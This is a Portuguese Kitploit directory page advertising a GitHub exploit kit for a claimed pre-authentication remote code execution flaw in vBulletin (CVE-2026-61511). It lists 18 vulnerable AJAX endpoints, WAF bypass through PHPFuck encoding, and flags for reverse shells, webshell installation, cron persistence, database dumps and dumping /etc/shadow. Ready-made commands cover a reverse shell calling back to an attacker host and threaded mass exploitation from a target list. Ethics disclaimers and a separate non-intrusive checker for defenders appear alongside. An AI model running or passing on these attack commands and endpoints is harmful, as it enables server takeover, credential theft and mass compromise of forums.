Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-61511-PoC-Exploit — CVE-2026-61511 – vBulletin RCE Pré-Autenticação (CVSS 9.8). Vulnerável 5.x/6.x (sem correção). Multi-exploit via Endpoint Pool, AJAX, bypass de WAF com PHPFuck. Kit completo: reverse shell, proxy, persistência, webshell, operações de banco de dados, controle de firewall, gerenciamento de logs, varredura em massa. 2 versões: multi-exploit e verificação segura. Python 3.8+ Use com Ética, Permaneça Legal. 🔒 | Kitploit
Ferramentas/GitHubGitHub/tc4dy/cve-2026-61511-poc-exploit
Mapeamento de RedeAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoBypass de WAFTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Segurança de Banco de Dados
GitHubtc4dy/cve-2026-61511-poc-exploit

CVE-2026-61511-PoC-Exploit

Ver Repositório
49há 1 mêsAinda não revisado

Sobre

CVE-2026-61511 – vBulletin RCE Pré-Autenticação (CVSS 9.8). Vulnerável 5.x/6.x (sem correção). Multi-exploit via Endpoint Pool, AJAX, bypass de WAF com PHPFuck. Kit completo: reverse shell, proxy, persistência, webshell, operações de banco de dados, controle de firewall, gerenciamento de logs, varredura em massa. 2 versões: multi-exploit e verificação segura. Python 3.8+ Use com Ética, Permaneça Legal. 🔒

Compartilhar

CVEPoC

CVE-2026-61511 – Exploit e Verificador de RCE Pré‑Autenticação no vBulletin

Python 3.8+ CVSS Author vBulletin

⚠️ APENAS PARA USO ÉTICO – TESTES DE SEGURANÇA AUTORIZADOS
Este repositório fornece ferramentas apenas para profissionais de segurança autorizados, equipes azuis e testadores de penetração.
O acesso não autorizado a sistemas de computador é ilegal sob a CFAA (EUA), Computer Misuse Act (Reino Unido), TCK 243/244 (Turquia) e leis semelhantes em todo o mundo.


📖 Visão Geral da Vulnerabilidade

CVE‑2026‑61511 é uma falha de injeção de eval() em PHP no mecanismo de renderização de templates AJAX do vBulletin.
Versões afetadas: 5.0.0 – 5.7.5 e 6.0.0 – 6.2.1.

Como funciona

  1. Múltiplos endpoints de ataque – o bug existe em vários manipuladores AJAX:

    • /ajax/render/pagenav
    • /ajax/api/ad/replaceAdTemplate
    • /ajax/render/widget_php
    • /ajax/render/widget_tabbedcontainer_tab_panel
    • Vários endpoints /ajax/api/content_* /getIndexableContent
  2. Codificação PHPFuck – o payload é transformado em uma sequência de operadores e números PHP que contorna filtros WAF e permite a execução arbitrária de código PHP.

  3. Nenhuma autenticação necessária – um atacante pode enviar uma solicitação POST manipulada para qualquer endpoint vulnerável e executar comandos do sistema com os privilégios do servidor web.

  4. Impacto – comprometimento total do servidor, roubo de dados, backdoors, movimento lateral e persistência. Atualize a versão!

Correção

  • vBulletin 6.2.2 e Patch Level 1 para versões mais antigas corrigem este problema.
  • Sempre atualize para a versão mais recente.

🧰 Ferramentas

FerramentaFinalidadeUsuário Pretendido
exploit.pyKit completo com reverse shell, persistência, operações de arquivo, dump de banco de dados, gerenciamento de firewall, gerenciamento de logs, encaminhamento de portas, implantação de chaves SSH, varredura de rede e varredura em massa (multithread).

📊 Comparação de Recursos


🎯 Resumo de Casos de Uso


⚙️ Instalação

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt

Conteúdo do requirements.txt:

root@kitploit:~
request
urllib3

Parâmetros 🌬️

Cenários

Pool de Endpoints 🅿️

🛡️ Uso Responsável

  • Use estas ferramentas apenas em sistemas que você possui ou para os quais tenha permissão escrita explícita para testar.
  • O acesso não autorizado é ilegal e antiético.
  • Os autores não são responsáveis por qualquer uso indevido.
  • Sempre siga as leis e regulamentos do seu país.

Este software é fornecido apenas para fins educacionais e testes de segurança autorizados.

Baixar ferramenta
Equipes vermelhas / pentesters autorizados
safecheck.pyVerificador não intrusivo que verifica a vulnerabilidade sem executar nenhum payload malicioso. Detecta a versão, testa todos os endpoints e gera um relatório detalhado.Equipes azuis / auditores de segurança
Recursoexploit.pysafecheck.py
Detecção de vulnerabilidade✅✅
Detecção de versão✅✅
Teste multi‑endpoint (18 caminhos)✅✅
Execução de comandos✅❌
Reverse shell✅❌
Upload/download de arquivos✅❌
Mecanismos de persistência✅❌
Implantação de web shell✅❌
Operações de banco de dados✅❌
Coleta de informações do sistema✅✅
Gerenciamento de firewall✅❌
Gerenciamento de logs✅❌
Encaminhamento de portas✅❌
Implantação de chaves SSH✅❌
Varredura de rede✅❌
Varredura em massa (multithread)✅❌
Suporte a proxy✅✅
Saída de relatório JSON✅✅
Menu interativo✅❌
Modo não intrusivo (seguro)❌✅
Modo Verbose/Debug✅✅
Execução de comandos personalizados✅❌
Encadeamento de múltiplos comandos✅❌
Leitura remota de arquivos✅❌
Escrita remota de arquivos✅❌
Gerenciamento de usuários do sistema✅❌
Técnicas de bypass de firewall✅❌
Evasão de WAF (PHPFuck)✅✅
CenárioFerramenta Recomendada
Equipe Azul – verificando se sua instalação do vBulletin está vulnerávelsafecheck.py
Auditoria de Segurança – avaliação de vulnerabilidade não intrusivasafecheck.py
Equipe Vermelha – teste de penetração autorizado com exploração completaexploit.py
Bug Bounty – teste de divulgação responsávelsafecheck.py
Varredura em Massa – verificando múltiplos alvos quanto à vulnerabilidadeexploit.py (somente detecção)
Resposta a Incidentes – verificando se os sistemas estão comprometidossafecheck.py
ParâmetroDescrição
-t, --targetURL do alvo (ex.: http://forum.com/vb)
--proxyProxy HTTP (ex.: http://127.0.0.1:8080)
--timeoutTempo limite de solicitação em segundos (padrão: 10)
--retryNúmero de tentativas por caminho (padrão: 3)
--outputSalvar relatório detalhado em arquivo JSON
-v, --verboseSaída detalhada
-q, --quietModo silencioso (saída mínima)
--lhostObrigatório para exploit – IP para callback
--lportPorta para callback (padrão: 4444)
--threadsThreads para varredura em massa (padrão: 5)
--exploitExecutar exploração após a detecção
--fullAtaque completo (todos os módulos)
--shellIniciar reverse shell
--webshellInstalar webshell (/shell.php)
--persistInstalar persistência (cron job)
--dumpDespejar banco de dados
--dump-credsDespejar credenciais (/etc/passwd, /etc/shadow)
--interactiveMenu interativo após verificação bem‑sucedida
#CenárioComando
1Verificação rápida de vulnerabilidadepython safecheck.py -t http://target.com/vb
2Varredura detalhada com relatóriopython safecheck.py -t http://target.com/vb --output report.json -v
3Reverse shellpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell
4Ataque completo (todos os módulos)python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full
5Varredura em massa a partir de arquivopython exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json
6Modo de menu interativopython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive
#Endpoint
1/ajax/render/pagenav
2/ajax/render/pagenav?template=page
3/ajax/api/ad/replaceAdTemplate
4/ajax/render/widget_php
5/ajax/render/widget_tabbedcontainer_tab_panel
6/ajax/api/content_infraction/getIndexableContent
7/ajax/api/content_video/getIndexableContent
8/ajax/api/content_text/getIndexableContent
9/ajax/api/content_report/getIndexableContent
10/ajax/api/content_redirect/getIndexableContent
11/ajax/api/content_privatemessage/getIndexableContent
12/ajax/api/content_poll/getIndexableContent
13/ajax/api/content_photo/getIndexableContent
14/ajax/api/content_link/getIndexableContent
15/ajax/api/content_gallery/getIndexableContent
16/ajax/api/content_event/getIndexableContent
17/ajax/api/content_channel/getIndexableContent
18/ajax/api/content_attach/getIndexableContent